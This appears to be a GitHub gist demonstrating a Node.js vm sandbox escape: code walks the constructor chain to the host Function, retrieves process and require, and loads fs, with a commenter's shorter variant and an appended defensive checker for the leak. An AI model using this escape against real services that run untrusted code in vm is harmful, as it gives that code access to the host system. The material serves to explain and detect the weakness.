Escaping the vm sandbox
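"use strict";
const vm = require("vm");
// anObject is created in the host realm, so its prototype chain is the host's.
const sandbox = { anObject: {} };
const whatIsThis = vm.runInNewContext(`
// Host Object, reached through the host-created object
const ForeignObject = anObject.constructor;
// Host Function constructor
const ForeignFunction = ForeignObject.constructor;
// Code built by the host Function runs with the host's globals
const process = ForeignFunction("return process")();
const require = process.mainModule.require;
require("fs");
`, sandbox);
// whatIsThis now holds the host's fs module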

NiXXeD commented May 13, 2016 edited

Technically you can also just do:
const ForeignFunction = this.constructor.constructor;
since the context object itself is created in the context you want. You don't even need a foreign object.

Also, this still appears to be an issue in Node 6.1.0. Just tested this for a silly Hubot script we have.
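
A defender-side check for the leak discussed above, added here as an example and not part of the gist or the comment: it reports which references visible inside a context resolve to the host's Function constructor, using identity comparison only. The name hostFunctionLeaks and the sample sandboxes are constructed for illustration, and only the context global and one level of sandbox properties are inspected.

```javascript
"use strict";
const vm = require("vm");

// Returns the expressions, evaluated inside a context built from `sandbox`,
// whose constructor chain ends at the HOST realm's Function constructor.
// Only identity is compared; nothing reached this way is ever called.
function hostFunctionLeaks(sandbox) {
  const context = vm.createContext(sandbox);
  // Check the context's global plus each own enumerable sandbox property.
  const paths = [
    "this",
    ...Object.keys(sandbox).map((key) => `this[${JSON.stringify(key)}]`),
  ];
  return paths.filter((path) => {
    try {
      const ctor = vm.runInContext(`(${path}).constructor.constructor`, context);
      return ctor === Function; // same object as the host's Function?
    } catch {
      return false; // null, undefined or prototype-less value: no chain to follow
    }
  });
}

// Constructed sample sandboxes (hypothetical, for illustration only).
const plain = { anObject: {} }; // same shape as the gist's sandbox
const bare = Object.create(null); // sandbox without the host Object.prototype
const bareWithHostData = Object.assign(Object.create(null), { anObject: {} });
const bareWithBareData = Object.assign(Object.create(null), {
  anObject: Object.create(null),
  count: 3,
});

for (const [name, sandbox] of Object.entries({
  plain, bare, bareWithHostData, bareWithBareData,
})) {
  console.log(name, hostFunctionLeaks(sandbox));
}
```

An empty result only shows that this one path is closed for the values inspected. The Node.js documentation states that the vm module is not a security mechanism and should not be used to run untrusted code.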
